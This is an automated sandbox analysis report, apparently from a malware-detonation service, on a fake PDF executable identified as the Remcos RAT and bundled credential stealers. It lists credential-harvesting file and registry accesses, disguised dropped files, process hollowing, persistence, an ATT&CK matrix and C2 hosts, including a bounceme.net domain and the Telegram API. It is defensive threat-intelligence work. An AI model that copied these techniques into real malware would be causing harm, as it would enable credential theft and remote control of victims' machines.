                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\FTP Navigator\Ftplist.txt
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                              Source: C:\Users\user\AppData\Roaming\host.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Roaming\host.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Roaming\host.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: C:\Users\user\AppData\Roaming\host.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                              Source: C:\Users\user\AppData\Local\Temp\conserver.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                              Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                              Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: ESMTPPassword15_2_004033E2
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword15_2_00402DA5
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword15_2_00402DA5
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 6592, type: MEMORYSTR
                              Source: Yara matchFile source: 0000001A.00000002.3620793390.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.3619471195.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000018.00000002.1539307669.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Source: C:\Users\user\Desktop\Payment_Slip.pdf.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFDJump to behavior
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
                              Source: Yara matchFile source: 12.0.host.exe.240000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000000.1218869543.0000000000242000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\host.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED
                              Source: Yara matchFile source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exeCode function: cmd.exe11_2_0040567A
                              Source: C:\Users\user\AppData\Local\Temp\dwn.exeCode function: cmd.exe17_2_0040567A
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              3
                              OS Credential Dumping
                              2
                              System Time Discovery
                              Remote Services12
                              Archive Collected Data
                              1
                              Web Service
                              Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomainsDefault Accounts11
                              Native API
                              1
                              Windows Service
                              1
                              Access Token Manipulation
                              11
                              Deobfuscate/Decode Files or Information
                              221
                              Input Capture
                              1
                              Account Discovery
                              Remote Desktop Protocol2
                              Data from Local System
                              12
                              Ingress Tool Transfer
                              Exfiltration Over Bluetooth1
                              Defacement
                              Email AddressesDNS ServerDomain Accounts1
                              Shared Modules
                              1
                              Scheduled Task/Job
                              1
                              Windows Service
                              14
                              Obfuscated Files or Information
                              3
                              Credentials in Registry
                              1
                              System Service Discovery
                              SMB/Windows Admin Shares1
                              Email Collection
                              21
                              Encrypted Channel
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts13
                              Command and Scripting Interpreter
                              11
                              Registry Run Keys / Startup Folder
                              322
                              Process Injection
                              12
                              Software Packing
                              3
                              Credentials In Files
                              3
                              File and Directory Discovery
                              Distributed Component Object Model221
                              Input Capture
                              1
                              Non-Standard Port
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud Accounts1
                              Scheduled Task/Job
                              Network Logon Script1
                              Scheduled Task/Job
                              1
                              DLL Side-Loading
                              LSA Secrets59
                              System Information Discovery
                              SSH4
                              Clipboard Data
                              1
                              Remote Access Software
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable Media2
                              Service Execution
                              RC Scripts11
                              Registry Run Keys / Startup Folder
                              111
                              Masquerading
                              Cached Domain Credentials251
                              Security Software Discovery
                              VNCGUI Input Capture3
                              Non-Application Layer Protocol
                              Data Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                              Virtualization/Sandbox Evasion
                              DCSync151
                              Virtualization/Sandbox Evasion
                              Windows Remote ManagementWeb Portal Capture124
                              Application Layer Protocol
                              Exfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              Access Token Manipulation
                              Proc Filesystem4
                              Process Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt322
                              Process Injection
                              /etc/passwd and /etc/shadow1
                              Application Window Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Hidden Files and Directories
                              Network Sniffing1
                              System Owner/User Discovery
                              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                              System Network Configuration Discovery
                              Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1639467 Sample: Payment_Slip.pdf.exe Startdate: 15/03/2025 Architecture: WINDOWS Score: 100 81 api.telegram.org 2->81 83 ratianaana701.bounceme.net 2->83 85 3 other IPs or domains 2->85 117 Suricata IDS alerts for network traffic 2->117 119 Found malware configuration 2->119 121 Malicious sample detected (through community Yara rule) 2->121 125 20 other signatures 2->125 8 Payment_Slip.pdf.exe 7 2->8         started        12 mHTmhPhJy.exe 5 2->12         started        14 mykksg.exe 2->14         started        16 4 other processes 2->16 signatures3 123 Uses the Telegram API (likely for C&C communication) 81->123 process4 dnsIp5 63 C:\Users\user\AppData\Roaming\mHTmhPhJy.exe, PE32 8->63 dropped 65 C:\Users\...\mHTmhPhJy.exe:Zone.Identifier, ASCII 8->65 dropped 67 C:\Users\user\AppData\Local\...\tmp2819.tmp, XML 8->67 dropped 69 C:\Users\user\...\Payment_Slip.pdf.exe.log, ASCII 8->69 dropped 137 Tries to steal Mail credentials (via file registry) 8->137 139 Uses schtasks.exe or at.exe to add and modify task schedules 8->139 159 2 other signatures 8->159 19 Payment_Slip.pdf.exe 2 20 8->19         started        24 powershell.exe 23 8->24         started        26 schtasks.exe 1 8->26         started        141 Multi AV Scanner detection for dropped file 12->141 143 Contains functionalty to change the wallpaper 12->143 145 Contains functionality to steal Chrome passwords or cookies 12->145 161 3 other signatures 12->161 28 mHTmhPhJy.exe 12->28         started        30 schtasks.exe 1 12->30         started        147 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->147 149 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->149 151 Tries to steal Mail credentials (via file / registry access) 14->151 71 127.0.0.1 unknown unknown 16->71 153 Tries to harvest and steal ftp login credentials 16->153 155 Tries to harvest and steal browser information (history, passwords, etc) 16->155 157 Installs a global keyboard hook 16->157 file6 signatures7 process8 dnsIp9 87 ratianaana701.bounceme.net 103.186.117.228, 49720, 49721, 49722 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown 19->87 89 geoplugin.net 178.237.33.50, 49726, 80 ATOM86-ASATOM86NL Netherlands 19->89 55 C:\Users\user\AppData\Roaming\host.exe, PE32 19->55 dropped 57 C:\Users\user\AppData\Local\Temp\dwn.exe, PE32 19->57 dropped 59 C:\Users\user\AppData\Local\...\conserver.exe, PE32 19->59 dropped 61 C:\ProgramData\remcos\logs.dat, data 19->61 dropped 127 Detected Remcos RAT 19->127 129 Maps a DLL or memory area into another process 19->129 131 Sample uses process hollowing technique 19->131 133 Installs a global keyboard hook 19->133 32 conserver.exe 19->32         started        37 host.exe 19->37         started        39 dwn.exe 19->39         started        49 3 other processes 19->49 135 Loading BitLocker PowerShell Module 24->135 41 WmiPrvSE.exe 24->41         started        43 conhost.exe 24->43         started        45 conhost.exe 26->45         started        47 conhost.exe 30->47         started        file10 signatures11 process12 dnsIp13 73 smtp.gmail.com 66.102.1.109, 49731, 49736, 49740 GOOGLEUS United States 32->73 75 74.125.71.108, 49766, 49770, 587 GOOGLEUS United States 32->75 51 C:\Users\user\AppData\...\Windows Update.exe, PE32 32->51 dropped 91 Antivirus detection for dropped file 32->91 93 Multi AV Scanner detection for dropped file 32->93 95 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 32->95 113 2 other signatures 32->113 77 api.telegram.org 149.154.167.220, 443, 49733, 49735 TELEGRAMRU United Kingdom 37->77 79 api.ipify.org 104.26.12.205, 443, 49730, 49742 CLOUDFLARENETUS United States 37->79 53 C:\Users\user\AppData\Roaming\...\mykksg.exe, PE32 37->53 dropped 97 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->97 99 Tries to steal Mail credentials (via file / registry access) 37->99 101 Creates multiple autostart registry keys 37->101 103 Detected Remcos RAT 39->103 105 Contains functionalty to change the wallpaper 39->105 107 Contains functionality to steal Chrome passwords or cookies 39->107 115 2 other signatures 39->115 109 Tries to steal Instant Messenger accounts or passwords 49->109 111 Tries to harvest and steal browser information (history, passwords, etc) 49->111 file14 signatures15

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.